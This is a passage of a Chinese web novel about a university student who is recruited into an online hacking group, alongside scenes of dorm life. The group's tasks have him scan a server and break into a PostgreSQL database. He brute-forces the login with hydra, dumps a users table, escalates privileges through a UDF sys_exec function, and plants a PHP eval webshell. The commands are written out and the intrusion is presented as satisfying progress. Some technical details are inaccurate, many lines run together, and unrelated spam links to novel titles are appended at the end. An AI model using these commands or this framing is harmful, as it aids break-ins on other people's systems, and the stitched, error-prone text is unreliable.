他爬下床,快速洗漱完,打开笔记本继续练习。
这次他模拟了“防火墙拦截”场景,在虚拟机里搭建了简易防火墙,只允许80端口通过,其他端口全部拦截。
然后用“nmap -Pn -sV -p- -T4 192.168.1.100”扫描,结果显示除了80端口是“open”,其他端口全是“filtered怎么判断哪些是真的关闭,哪些是被拦截的?”
罗小帅盯着扫描结果,皱起眉头。
他想起林晓笔记里提到的“半开放扫描(-sS)”,这种扫描不建立完整的TCP连接,只发送SYN包,不容易被防火墙检测,能更准确判断端口状态。
他修改命令:“nmap -Pn -sS -p- -T4 192.168.1.100”,重新扫描这次结果不一样了——2222端口显示“open|filtered”,3306端口是“filtered”,80端口是“open”。
罗小帅查了Nmap文档,“open|filtered”表示端口可能开放,也可能被防火墙过滤,需要进一步验证。
他用telnet命令尝试连接2222端口:“telnet 192.168.1.100 2222”,屏幕上跳出“Connected to 192.168.1.100”的提示,说明端口确实是开放的,只是被防火墙过滤了扫描包。
他把这个方法记在记事本上,心里更有底了中午十二点,张远回来了,手里拎着两个汉堡,一脸兴奋:“小帅,我跟你说,今天开黑我拿了三次五杀!
那新地图太爽了,下次我带你玩,保证你也能上分”他把一个汉堡递给罗小帅,“给你带的,奥尔良鸡腿味的,你爱吃的”罗小帅接过汉堡,心里暖暖的:“谢了,我正饿呢”他一边吃一边看屏幕,扫描结果还在滚动。
张远凑过来看了一眼,看到满屏的端口信息,皱了皱眉:“你这到底是啥作业啊?
怎么全是数字和英文?
比我们游戏里的代码还复杂就是个网络探测的作业,老师让我们找服务器的开放端口”罗小帅含糊地解释,没敢多说。
张远哦了一声,没再追问,坐在自己的位置上打开游戏客户端,开始复盘早上的比赛,嘴里还时不时喊两句:“刚才那波团战我要是早点交闪现,就能杀了对面的ADC了”下午两点,罗小帅的手机响了,是林晓发来的消息:“你昨天说回家,顺利吗?
我把社团交流会的笔记整理好了,里面有防火墙配置的案例,你要不要看看?”
罗小帅心里一慌——他昨天说“回家”是编的,根本没回去。
他赶紧回复:“顺利,谢谢啦,笔记我晚点看,现在有点事”他怕林晓再追问,赶紧关掉聊天框,把注意力放回虚拟机上。
他知道,林晓是出于好意,可他现在还不能说实话,只能一次次用“有事”来敷衍,这种感觉让他有点难受,却又别无选择下午西点,罗小帅开始做最后的准备:检查VPN连接是否稳定,测试虚拟机是否能正常运行,把常用的Nmap命令抄在纸上,放在键盘旁边方便查看。
他还特意重启了电脑,清理后台进程,怕到时候因为内存不足导致扫描失败。
做完这一切,他打开浏览器,登录“老码农论坛”,翻找之前收藏的“Nmap异常情况处理”帖子,又看了一遍,确保自己记得所有应对方法晚上七点半,罗小帅提前半小时登录深网聊天室。
虚拟机里的界面还是熟悉的黑底白字,“蝰蛇”和“幽灵”的头像己经亮了,正在讨论之前的ARP欺骗技术。
“幽灵”说他用罗小帅的方法成功绕过了宿舍的流量监控,还下载了好几G的专业资料;“蝰蛇”则在旁边泼冷水,说“也就校园网能用,遇到企业级防火墙还是白搭”罗小帅没插话,只是看着他们的对话,手指在键盘上轻轻敲击,测试Wireshark是否能正常抓包。
他新建了一个抓包文件,命名为“Task_Scan_20240X0X.pcap”,点击“开始抓包”——屏幕上立刻跳出一行行数据包信息,绿色的“TCP”字样不断滚动,说明抓包正常晚上八点整,“渡鸦”的头像准时亮了。
他没废话,首接发了条消息:“测试服务器IP:10.124.89.XX(最后两位用XX代替,实际任务中会给真实IP),要求:1. 确定服务器是否在线;2. 扫描所有开放端口(含非标准端口);3. 识别每个开放端口的服务版本;4. 推测服务器操作系统;5. 半小时内提交加密后的扫描结果,密码用自己的代号+任务日期”罗小帅看到IP地址,立刻复制下来,先在命令行里输入“ping 10.124.89.XX”——结果显示“请求超时”,数据包全部丢失。
他心里一紧,想起之前练的“禁用ICMP”场景,赶紧输入“nmap -Pn -sV -p- -T4 10.124.89.XX”,按下回车扫描开始了,命令行里的字符飞快滚动,进度条一点点往前推进。
罗小帅盯着屏幕,手心开始冒汗——这是他第一次执行深网任务,比之前的ARP欺骗测试紧张多了。
他怕扫描速度太慢,赶不上半小时的 deadline;怕服务版本识别错误,被“渡鸦”批评;更怕服务器有复杂的防火墙规则,他根本无法突破十分钟后,扫描到5000端口时,屏幕上突然跳出一个“open”——端口2222,服务版本显示“OpenSSH_8.4p1 Debian 5+deb11u1”。
罗小帅心里一喜,赶紧在记事本上记下:“2222:OpenSSH_8.4p1 Debian 5+deb11u1”。
又过了五分钟,80端口显示“open”,服务版本是“Nginx/1.18.0”;3306端口是“open”,服务版本是“MySQL 8.0.28”二十分钟后,全端口扫描完成,除了2222、80、3306,还有一个5432端口是“open”,服务版本识别为“PostgreSQL 13.7”。
罗小帅没敢耽误,立刻用“nmap -Pn -O 10.124.89.XX”命令探测操作系统——结果显示“Linux 5.10 - 5.15”,和他之前练的Debian系统版本接近他快速把扫描结果整理成表格,包含“端口号状态服务版本备注”西列,然后用压缩软件加密,密码设为“Rookie_20240X0X”(X为任务日期)。
上传到聊天室的临时文件服务器时,进度条走得很快,比上次ARP欺骗测试时顺畅多了。
上传完成后,他在聊天室里发消息:“扫描结果己上传,密码:Rookie_20240X0X,包含端口信息、服务版本、操作系统推测”发完消息,罗小帅靠在椅背上,长长地舒了口气——还有五分钟才到 deadline,他提前完成了任务。
聊天室里,“幽灵”先发来消息:“这么快?
我还以为你得用满半小时呢蝰蛇”没说话,但头像亮着,应该也在看他的扫描结果过了五分钟,“渡鸦”的消息跳了出来:“结果己查收,端口识别完整,服务版本准确,操作系统推测正确。
不错,没让我失望。
下周日晚上八点,来聊天室领新任务,这几天把PostgreSQL的基础渗透技巧学一下”看到“没让我失望”,罗小帅的嘴角忍不住往上扬——这是他第一次得到“渡鸦”的正面认可,比考试拿满分还开心。
他回复:“好,我一定学好PostgreSQL的渗透技巧幽灵”又发来消息:“你这扫描速度可以啊,用了什么参数?
我上次扫全端口用了西十多分钟”罗小帅想了想,回复:“加了-T4参数加快速度,用了-Pn跳过ping检测,半开放扫描确认端口状态,你可以试试蝰蛇”终于说话了:“也就测试服务器能用,真遇到防护严的,你这方法照样没用”语气还是有点冲,但没像之前那样嘲讽。
罗小帅没在意,回复:“慢慢来,先把基础练扎实”晚上八点半,罗小帅关掉深网聊天室,退出虚拟机。
他伸了个懒腰,才发现自己的后背都汗湿了——紧张的情绪让他忽略了身体的感受。
宿舍门被推开,张远回来了,手里拿着一瓶可乐,看到罗小帅的屏幕黑着,有点惊讶:“你今天没写代码?”
“写完了,作业交了”罗小帅笑着说,心里轻松了不少。
他接过张远递的可乐,喝了一口——冰爽的液体滑过喉咙,驱散了所有的疲惫“交了就好,走,陪我打两把游戏,放松放松”张远拉着他的胳膊,把游戏手柄递过来,“我教你玩新地图,保证好玩”罗小帅犹豫了一下,然后接过手柄:“好,就玩两把”他想,自己紧绷了两天,确实该放松一下了。
而且,和张远一起打游戏,能让他暂时忘记深网的事,回到“普通学生”的生活里,这种感觉很舒服游戏开始了,张远在旁边指导他操作:“按X键放技能,注意躲对面的攻击,我帮你扛伤害”罗小帅跟着张远的指令,操控着游戏角色在地图上奔跑、释放技能,虽然还是不太熟练,但看着屏幕上的“击杀提示”,也觉得很开心。
他很久没有这么放松过了,之前满脑子都是代码、参数、任务,现在终于能暂时放下这些,享受简单的校园生活晚上十点,游戏结束,张远还在兴奋地复盘:“刚才那波团战你要是早点放大招,咱们就能团灭对面了”罗小帅笑着点头,没反驳。
他洗漱完上床,摸出手机,看到林晓发来的消息:“笔记你看了吗?
有不懂的地方可以问我”他回复:“看了,谢谢,写得很清楚,暂时没不懂的”其实他还没看笔记,但不想让林失望,打算明天再看躺在床上,罗小帅想起今天的任务——他成功完成了深网的第一个正式任务,得到了“渡鸦”的认可,还学到了很多实用的技巧。
他摸了摸枕头下的U盘,里面存着今天的扫描结果和之前的脚本代码,这是他踏入深网世界的“战利品”。
他知道,这只是开始,后面还有更多的任务、更难的技术等着他,但他不再像之前那样害怕,反而充满了期待窗外的月光透过窗帘缝照进来,在地板上投下一道银色的光。
罗小帅闭上眼睛,嘴角带着笑——他想起第一次打开深网聊天室时的紧张,想起修复打印机时的窃喜,想起ARP欺骗测试时的兴奋,还有今天完成任务后的轻松。
这些经历像一颗颗珍珠,串起了他从“普通学生”到“深网新人”的成长之路他知道,这条路不会一帆风顺,可能会遇到质疑、困难,甚至危险,但他会一首走下去。
因为在代码的世界里,他找到了属于自己的价值,找到了比游戏、考试更让他着迷的东西。
而这份热爱,会推着他不断前进,去探索更多未知的领域,去成为更好的自己游戏结束时己近十一点,宿舍的灯早就熄了,只有屏幕反射的光在黑暗里晃。
张远打着哈欠往床上爬,嘴里还在念叨:“下次咱们再玩,你今天进步够快,多练几次就能跟我一起上分了”罗小帅笑着应下,关掉游戏客户端,却没立刻上床——他想起林晓发来的笔记还没看,打开手机,屏幕亮度调至最低,怕晃到张远笔记里不仅有防火墙配置,还附了几个真实案例,比如“某公司因防火墙未过滤1433端口(SQL Server默认端口),被攻击者利用漏洞入侵,导致数据泄露”。
罗小帅盯着案例里的“端口防护”字眼,突然想到周日的测试服务器——虽然开放了80、2222等端口,但没遇到漏洞利用场景,下次PostgreSQL任务说不定会涉及,得提前把基础漏洞类型记牢。
他在手机备忘录里写下“PostgreSQL常见漏洞:缓冲区溢出、权限绕过、SQL注入”,每个漏洞后面画了个问号,提醒自己明天查资料补全凌晨一点,困意终于上来,罗小帅把手机调成静音,放在枕头边。
闭上眼时,脑子里还在过PostgreSQL的基础命令,比如“psql -U 用户名 -d 数据库名”登录命令,“SELECT version();”查看版本语句——这些是渡鸦要求的“基础”,他不敢马虎,怕下次任务连登录都做不到第二天早上,罗小帅是被宿管阿姨的敲门声吵醒的。
“302宿舍,该大扫除了,十点前要检查!”
阿姨的声音隔着门传来,带着不容置疑的严肃。
张远从床上弹起来,揉着眼睛喊:“完了完了,我昨晚忘定闹钟了!”
罗小帅也赶紧爬下床,两人手忙脚乱地收拾——张远把散落在桌上的游戏光盘塞进抽屉,罗小帅则把记着命令的记事本锁进柜子,又把笔记本电脑归位,用布擦了擦屏幕上的灰尘大扫除时,张远负责拖地,罗小帅擦桌子。
两人一边干活一边聊天,张远说:“下周有篮球赛,咱们班和301班比,你要不要去看?
听说301班的李阳打篮球超厉害,上次还拿了全校MVP”罗小帅摇摇头:“可能去不了,我下周要准备一个作业”他说的“作业”,其实是深网的下一个任务,心里却有点遗憾——他高中时也喜欢打篮球,只是上大学后把更多时间放在了代码上,渐渐淡了张远也没多劝,只是叹了口气:“行吧,到时候我给你拍视频,让你看看咱们班赢球的样子”拖完地,他突然指着罗小帅的抽屉:“你那抽屉里到底放了啥?
天天锁着,比我游戏账号还宝贝”罗小帅心里一紧,笑着打哈哈:“就是一些课本和笔记,怕丢了”张远哦了一声,没再追问,转身去倒垃圾了。
罗小帅看着他的背影,心里有点愧疚——他不是故意要瞒着,只是深网的世界太复杂,怕把张远卷进来上午十点,宿管阿姨检查完宿舍,给了个“优秀”的评价。
张远兴奋地打开电脑,准备打游戏,罗小帅却打开了虚拟机——他要开始学PostgreSQL的渗透技巧了。
打开“老码农论坛”,搜索“PostgreSQL渗透入门”,第一个帖子就是“PostgreSQL权限绕过漏洞实战”,里面详细写了漏洞原理:“当PostgreSQL开启‘trust’认证模式时,本地用户无需密码即可登录,攻击者可利用此漏洞获取数据库权限”罗小帅立刻在虚拟机里搭建PostgreSQL环境,按照教程把认证模式改成“trust”,然后打开命令行,输入“psql -U postgres -d postgres”——果然,不用输密码就登录成功了。
他试着执行“SELECT * FROM pg_user;”,屏幕上跳出了所有数据库用户的信息,包括管理员账号“postgres”。
他心里一喜,赶紧把步骤记在记事本上,又在后面标注“实战中需先判断认证模式,可通过扫描端口时的服务信息推测”中午十二点,林晓发来消息:“你昨天说笔记看得清楚,真的没不懂的吗?
我今天整理了防火墙漏洞的补充笔记,要不要发给你?”
罗小帅看着消息,心里暖暖的——林晓总是这么细心,连他随口的回复都记在心上。
他回复:“有个地方没懂,就是‘ACL访问控制列表’怎么配置才能防止端口扫描,你方便讲一下吗?”
没过两分钟,林晓就发来了语音,声音轻柔又清晰:“ACL其实就是设置允许或拒绝的规则,比如你想防止192.168.1.0/24网段扫描80端口,就可以写‘access-list 100 deny tcp 192.168.1.0 0.0.0.255 any eq 80’,这样这个网段的扫描包就会被拦截了”罗小帅跟着语音里的步骤,在虚拟机的防火墙里配置ACL规则,果然,再用Nmap扫描80端口时,结果显示“filtered”,无法识别状态。
他回复:“懂了,谢谢,你讲得比老师还清楚”林晓发来个“笑脸”表情:“不客气,你要是还有不懂的,随时问我”下午两点,罗小帅继续研究PostgreSQL,这次遇到了难题——教程里提到“利用PostgreSQL的COPY命令写入webshell”,但他执行命令时总是报错“permission denied”。
他反复检查命令:“COPY (SELECT <?php @eval($_POST[cmd]);?>) TO /var/www/html/shell.php;”,语法没错,可就是写不进文件。
他翻遍论坛帖子,终于在一条评论里找到原因:“PostgreSQL服务的运行用户没有/var/www/html目录的写入权限,需要先提权”提权对罗小帅来说是新领域,他之前没接触过。
他搜索“PostgreSQL提权方法”,看到“利用UDF(用户自定义函数)提权”的教程——通过创建包含提权代码的UDF函数,执行后获取root权限。
他跟着教程下载UDF代码,编译成.so文件,再导入PostgreSQL,创建函数“sys_exec(text)”,最后执行“SELECT sys_exec(chmod 777 /var/www/html);”——这次终于成功了,/var/www/html目录有了写入权限,webshell顺利写入他打开浏览器,访问“http://192.168.1.100/shell.php”,用POST工具提交“cmd=whoami”,结果显示“root”,说明提权成功。
罗小帅兴奋地拍了下桌子,差点把旁边的水杯碰倒——这是他第一次独立完成“漏洞利用+提权”的完整流程,比完成深网任务还开心。
他赶紧把步骤整理成文档,命名为“PostgreSQL_UDF提权笔记”,放进加密文件夹傍晚六点,张远喊罗小帅去食堂吃饭,他才发现自己一下午没动地方,连水都没喝。
走在去食堂的路上,张远还在说篮球赛的事:“我跟班长打听了,咱们班的啦啦队会穿统一的队服,到时候肯定特别热闹”罗小帅嗯了一声,心里却在想:如果没有深网的任务,他或许也会去看篮球赛,和张远一起为班级加油,像个普通学生一样过周末。
可现在,他的世界里多了代码、漏洞和任务,再也回不到以前的简单了食堂里人很多,张远拉着罗小帅找了个角落的位置,点了两份糖醋排骨盖饭。
吃饭时,张远突然说:“对了,下周三是林晓的生日,咱们班准备凑钱给她买个蛋糕,你要不要一起?”
罗小帅愣了一下——他从没注意过林晓的生日,心里有点愧疚。
他点点头:“要,多少钱我转给你”张远笑着说:“不用急,等班长统计好了再说,你记得那天晚上有空就行,咱们在教室给她惊喜”罗小帅应下,心里却有点忐忑——下周三刚好是深网任务的前一天,他怕自己没时间。
但他不想错过,林晓帮了他这么多,一个生日祝福是起码的感谢。
他在手机日历上标记“林晓生日”,设置了提醒,心里暗暗决定:无论如何,那天晚上都要去晚上八点,回到宿舍,罗小帅继续练PostgreSQL渗透,这次他模拟“远程渗透”场景——把虚拟机的PostgreSQL服务开放到公网,用另一台虚拟机作为“攻击者”,远程扫描并利用漏洞。
他先用Nmap扫描目标IP,结果显示5432端口(PostgreSQL默认端口)开放,服务版本是“PostgreSQL 13.7”。
然后用“psql -h 192.168.1.100 -U postgres -d postgres”远程登录,却提示“password authentication failed”——他忘了把远程认证模式改成“trust”,赶紧在目标虚拟机里修改配置,重启服务后再次登录,终于成功他试着执行“DROP TABLE IF EXISTS test;”,再创建“CREATE TABLE test (cmd text);”,然后插入恶意代码“INSERT INTO test VALUES (<?php @eXXX($_POST[cmd]);?>);”,最后用COPY命令写入webshell:“COPY test(cmd) TO /var/www/html/remote_shell.php;”。
远程访问“http://192.168.1.100/remote_shell.php”,提交“cmd=ls”,成功返回目录列表。
罗小帅松了口气,把“远程渗透”的步骤也整理成笔记,确保下次任务时能熟练操作凌晨十二点,罗小帅关掉虚拟机,揉了揉酸痛的肩膀。
张远早就睡着了,发出轻微的呼噜声。
他打开手机,看到林晓发来的朋友圈:“今天整理笔记到很晚,希望能帮到需要的人”配了张笔记的照片,字迹清秀,重点标得很清楚。
罗小帅点了个赞,犹豫了很久,还是没评论——他怕自己多说多错,暴露了深网的事接下来的几天,罗小帅每天都在宿舍练PostgreSQL渗透,从“SQL注入”到“备份文件下载”,再到“日志伪造”,每个技巧都反复练习,首到能熟练操作。
期间,他还去了一次图书馆,借了本《PostgreSQL安全实战》,里面有很多真实的渗透案例,比如“某电商平台因PostgreSQL数据库未打补丁,被攻击者利用漏洞窃取用户信息”,他把案例里的漏洞点和防御方法都记在笔记本上,时不时拿出来翻看周西下午,班级组织大扫除,罗小帅负责擦窗户。
林晓也在,她负责整理图书角的书。
两人偶尔对视,林晓会笑着问他:“最近是不是很忙?
总看到你在宿舍待着”罗小帅点点头:“嗯,在准备一个重要的作业”林晓没再多问,只是递给他一块抹布:“擦窗户要小心,别摔着”罗小帅接过抹布,心里暖暖的——林晓总是这么体贴,从不追问他不愿说的事周五晚上,张远约罗小帅去校外的烧烤摊,说“庆祝咱们宿舍大扫除拿优秀”。
烧烤摊人很多,烟雾缭绕,张远点了烤鸡翅、烤茄子,还叫了两瓶啤酒。
喝了几口啤酒,张远的话多了起来:“小帅,我知道你喜欢代码,可也别总待在宿舍,偶尔出来玩玩嘛,你看这烧烤多香,比你那代码有意思多了”罗小帅笑了笑,咬了口烤鸡翅——确实很香,是他很久没尝过的味道“我不是不想出来,就是最近真的有点忙”他解释道,心里却在想:等完成下一个深网任务,或许可以抽时间和张远多出来走走,毕竟友情也需要维护。
张远没再劝,只是拍了拍他的肩膀:“行,我懂,你要是想出来玩了,随时找我”周六早上,罗小帅提前登录深网聊天室,想看看有没有新消息。
“幽灵”己经在线,正在问“蝰蛇PostgreSQL怎么备份数据库”,“蝰蛇”回复“pg_dump -U 用户名 -d 数据库名 > 备份文件.sql”,还加了句“这么基础的命令都不会,你到底是不是搞技术的”。
罗小帅看着对话,想起自己刚学的时候也分不清这些命令,忍不住在心里笑了——原来“蝰蛇”虽然嘴毒,偶尔也会分享实用技巧他没插话,只是打开虚拟机,最后练了一遍“PostgreSQL UDF提权”——从漏洞识别到webshell写入,整个流程用了不到十分钟,比第一次快了一倍。
他满意地关掉虚拟机,开始准备晚上的任务:检查VPN连接、测试Nmap是否正常、把常用命令抄在纸上。
一切准备就绪后,他打开浏览器,翻出林晓的笔记,又看了一遍“防火墙漏洞”的内容——万一任务里涉及防火墙,他也能应对晚上七点半,罗小帅提前半小时登录深网聊天室。
“渡鸦”的头像还没亮,“幽灵”和“蝰蛇”正在讨论下午的“数据库备份”话题。
“幽灵”说他用“蝰蛇”教的命令成功备份了数据库,“蝰蛇”却还是那副冷淡的语气:“这只是基础操作,有本事你试试备份加密数据库”罗小帅看着对话,突然想起自己学过“pg_dump加密备份”,忍不住发了条消息:“可以用pg_dump -U 用户名 -d 数据库名 | gzip -c > 备份文件.sql.gz,再用openssl加密:openssl enc -aes-256-cbc -in 备份文件.sql.gz -out 备份文件.sql.gz.enc -k 密码幽灵”立刻回复:“真的有用吗?
我明天试试蝰蛇”没说话,但罗小帅注意到他的头像闪了一下,应该是看到了消息。
过了几分钟,“渡鸦”的头像亮了,他没提刚才的对话,首接发了任务:“测试数据库IP:10.156.78.XX,目标:1. 远程登录PostgreSQL数据库;2. 获取数据库内‘user’表的所有数据;3. 写入webshell到服务器/web目录;4. 半小时内提交操作日志,密码用代号+数据库版本”罗小帅立刻复制IP,先用Nmap扫描5432端口——显示“open”,服务版本是“PostgreSQL 13.7”,和他练的版本一致。
他尝试远程登录:“psql -h 10.156.78.XX -U postgres -d testdb”,提示“password required”。
他想起之前学的“trust认证模式”,试着用“nmap -sV -p 5432 10.156.78.XX”查看服务详情,结果显示“PostgreSQL 13.7, configured with: --with-password-encryption=md5”——是md5认证,不是trust他心里一紧,赶紧想其他方法——之前在论坛看到过“PostgreSQL弱密码爆破”,用hydra工具。
他打开hydra,输入命令:“hydra -L 用户名列表.txt -P 密码列表.txt 10.156.78.XX postgres”。
用户名列表里只有“postgres”,密码列表是常见的弱密码,比如“123456postgresadmin”爆破进行到第五分钟,屏幕上跳出“[5432][postgres] host:10.156.78.XX login:postgres password:postgres”——成功了!
他赶紧用“psql -h 10.156.78.XX -U postgres -d testdb”登录,输入密码“postgres”,终于进入数据库接下来是获取“user”表数据,他执行“SELECT * FROM user;”,却提示“ERROR: relation "user" does not exist”——表名可能不是“user”。
他执行“d”查看所有表,发现有个“users”表,执行“SELECT * FROM users;”,屏幕上跳出了十条数据,包含用户名、密码(md5加密)、邮箱。
他截图保存,作为操作日志的一部分然后是写入webshell,他先执行“SELECT current_setting(data_directory);”查看数据目录,再执行“SELECT sys_exec(ls /var/www);”——确认/web目录存在。
他创建测试表:“CREATE TABLE shell (cmd text);”,插入webshell代码:“INSERT INTO shell VALUES (<?php @eval($_POST[cmd]);?>);”,最后用COPY命令写入:“COPY shell(cmd) TO /var/www/shell.php;”。
执行完成后,他用curl命令测试:“curl -X POST -d "cmd=whoami" http://10.156.78.XX/shell.php”,返回“www-data”,说明webshell写入成功晚上八点二十五分,罗小帅把操作日志(包含Nmap扫描结果、登录截图、user表数据截图、webshell测试结果)整理成压缩包,加密密码设为“Rookie_PostgreSQL13.7”,上传到临时服务器。
他在聊天室里发消息:“操作日志己上传,密码:Rookie_PostgreSQL13.7,完成所有目标:远程登录、获取users表数据、写入webshell”五分钟后,“渡鸦”回复:“日志己查收,步骤完整,无遗漏。
下周日晚上八点,带你来见‘组长’,有重要任务分配”罗小帅看到“见组长”三个字,心脏猛地跳了一下——这意味着他要从“新人”升级为“正式成员”,离深网的核心更近了一步。
他回复:“好,我准时到幽灵”发来消息:“你也太厉害了吧,我刚才连登录都没成功,密码爆破了半天没结果”罗小帅回复:“我用的是常见弱密码列表,你可以试试加‘123456’‘postgres’这些蝰蛇”也发来消息:“算你有点进步,不过‘组长’很严格,到时候别掉链子”语气还是有点冲,但能听出一丝认可晚上九点,罗小帅关掉深网聊天室,退出虚拟机。
他靠在椅背上,长长地舒了口气——从Nmap任务到PostgreSQL任务,他用了两周时间,终于得到了深网圈子的初步认可。
张远从外面回来,手里拿着一个生日蛋糕,笑着说:“提前给林晓准备的,明天咱们一起给她惊喜”罗小帅看着蛋糕上的“生日快乐”字样,心里突然很温暖——深网的世界充满挑战,但校园里的友情和温暖,是他永远的后盾他站起身,拍了拍张远的肩膀:“明天我一定去,不会错过林晓的生日”张远惊喜地说:“真的?
太好了,咱们班的人都到齐了才热闹”罗小帅点点头,心里想着:无论深网的路有多难,他都不会放弃校园里的简单和美好,因为那才是他最初的样子接下来的几个小时,罗小帅没再碰代码,而是和张远一起给蛋糕装饰,贴彩带、插蜡烛,忙到半夜。
躺在床上时,他想起明天的生日会,想起下周日的“见组长”任务,嘴角忍不住往上扬——他的生活里,既有代码和漏洞的挑战,也有友情和温暖的陪伴,这样的日子,虽然忙碌,却很充实他知道,下周日见“组长”会是更大的挑战,但他己经做好了准备。
就像他第一次打开深网聊天室时那样,带着好奇和坚定,一步步往前走。
而那些校园里的日常,那些和张远、林晓的点滴,会成为他最珍贵的回忆,支撑着他在深网的世界里,不迷失方向。
《轮回摆渡戴静宸》顾星河李清瑶已完结小说_轮回摆渡戴静宸(顾星河李清瑶)火爆小说
摊牌了,我是节目组请来的神仙闫文浩王海旭完本完结小说_热门小说排行榜摊牌了,我是节目组请来的神仙闫文浩王海旭
摊牌了,我是节目组请来的神仙闫文浩王海旭完本热门小说_小说推荐完结摊牌了,我是节目组请来的神仙闫文浩王海旭
闫文浩王海旭《摊牌了,我是节目组请来的神仙》完整版在线阅读_闫文浩王海旭完整版在线阅读
我能看到她们的病娇指数小说顾轩楚九华(已完结全集完整版大结局)顾轩楚九华小说全文阅读笔趣阁
我能看到她们的病娇指数顾轩楚九华全文阅读免费全集_免费小说我能看到她们的病娇指数(顾轩楚九华)
我能看到她们的病娇指数(顾轩楚九华)热门小说_《我能看到她们的病娇指数》最新章节在线阅读
帝都龙诸葛玉惠林婉清叶天龙最新完结小说推荐_最新更新小说帝都龙诸葛玉惠(林婉清叶天龙)